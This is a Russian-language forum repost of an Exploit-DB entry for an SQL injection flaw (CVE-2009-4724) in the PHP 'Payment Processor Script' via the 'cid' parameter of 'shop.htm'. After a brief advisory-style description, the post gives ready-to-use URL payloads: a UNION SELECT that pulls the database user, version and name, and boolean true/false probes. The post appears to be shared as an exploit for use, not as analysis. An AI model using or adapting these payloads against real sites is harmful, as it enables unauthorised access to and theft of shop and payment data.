Exploit Payment Processor Script (PPScript) - 'shop.htm' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34493
Проверка EDB
  1. Пройдено
Автор
MIZOZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4724
Дата публикации
2009-08-03
Payment Processor Script (PPScript) - 'shop.htm' SQL Injection
Код:
source: https://www.securityfocus.com/bid/42539/info

PPScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 


http://www.example.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())
http://www.example.com/shop.htm?cid=31+and+1=1
http://www.example.com/shop.htm?cid=31+and+1=100
 
Источник
www.exploit-db.com

Похожие темы